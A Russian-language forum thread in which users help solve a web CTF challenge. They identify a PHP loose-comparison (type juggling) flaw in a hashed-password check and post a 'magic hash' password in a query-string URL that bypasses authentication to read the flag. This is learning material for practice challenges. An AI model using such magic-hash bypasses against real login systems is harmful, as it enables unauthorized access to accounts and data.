 |
|
24.02.2025, 09:23
|
|
Новичок
Регистрация: 29.01.2025
Сообщений: 0
С нами:
680115
Репутация:
0
|
|
Всем привет! Возникли трудности с решением CTF по этому адресу - http://ib-sec.pro:8009
Текст задания звучит так: Админ спрятал свой грязный секрет и надежно все защитил. Можно ли узнать секрет админа?
Как я понял, используется уязвимость CRLF, так же в разметке есть подсказка, если добавить к адресу /?source, то он показывает исходный код сайта, в котором есть php
$check";} ?>
На этом я зашёл в тупик, пробовал по разному вводить URL запросы, за 3 дня так и не смог найти решение, очень прошу, помогите, пожалуйста
|
|
|
24.02.2025, 10:09
|
|
Новичок
Регистрация: 14.08.2020
Сообщений: 0
С нами:
3025970
Репутация:
0
|
|
if ($username == 'admin' && $password == 0){
include'./flag.php';
Мне кажется это и есть ответ, пробовал?
|
|
|
|
24.02.2025, 11:21
|
|
Новичок
Регистрация: 26.04.2020
Сообщений: 0
С нами:
3183628
Репутация:
0
|
|
Здесь представлена уязвимость type jangling характерная для нестрогого сравнения в php если кратко, то тебе нужно найти такой пароль, чтобы первый символ его хеша начинался с 0
|
|
|
|
24.02.2025, 11:24
|
|
Новичок
Регистрация: 26.04.2020
Сообщений: 0
С нами:
3183628
Репутация:
0
|
|
PayloadsAllTheThings/Type Juggling/README.md at master · swisskyrepo/PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
github.com
|
|
|
|
24.02.2025, 13:47
|
|
Новичок
Регистрация: 22.02.2025
Сообщений: 12
С нами:
644908
Репутация:
0
|
|
http://ib-sec.pro:8009/?username=admin&password=a, get запрос -
Код:
Код:
$password = hash("SHA256", $_GET["password"]);
if ($username == 'admin' && $password == 0) {
include './flag.php';
}
|
|
|
|
25.02.2025, 13:35
|
|
Новичок
Регистрация: 29.01.2025
Сообщений: 0
С нами:
680115
Репутация:
0
|
|
sl1 сказал(а):
Мне кажется это и есть ответ, пробовал?
Пробовал, но перед отправкой пароля он его хэширует, слабым сравнением тоже пытался, чтобы хэш начинался с 0e и цифрами далее, но не помогло
Не знаю, что это может значит, но во кладке Network ко всему этому добавляется :5, возможно из-за этого обычные значения, которые при хэшировании для слабого сравнения равны 0 не работают
Возможно действительно нужно подобрать нужное значение, но я не знаю как
|
|
|
|
25.02.2025, 14:01
|
|
Новичок
Регистрация: 15.07.2018
Сообщений: 0
С нами:
4121094
Репутация:
0
|
|
http://ib-sec.pro:8009/?username=admin&password=34250003024812
Magic hash
|
|
|
|
25.02.2025, 14:26
|
|
Новичок
Регистрация: 29.01.2025
Сообщений: 0
С нами:
680115
Репутация:
0
|
|
N1GGA сказал(а):
http://ib-sec.pro:8009/?username=admin&password=34250003024812
Magic hash
Вау! Спасибо вам за помощь
|
|
|
|
25.02.2025, 15:51
|
|
Новичок
Регистрация: 14.08.2020
Сообщений: 0
С нами:
3025970
Репутация:
0
|
|
N1GGA сказал(а):
http://ib-sec.pro:8009/?username=admin&password=34250003024812
Magic hash
Мне тоже надо всю работю выполнить, смотрю желающие есть))
Человек постом ниже меня, дал очевидный и правильный ответ, и суть рассказал и решение точно такое же дал... но видимо надо именно так)))
|
|
|
|
25.02.2025, 16:05
|
|
Новичок
Регистрация: 26.04.2020
Сообщений: 0
С нами:
3183628
Репутация:
0
|
|
http://ib-sec.pro:8009/?username=admin&password=34250003024812
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
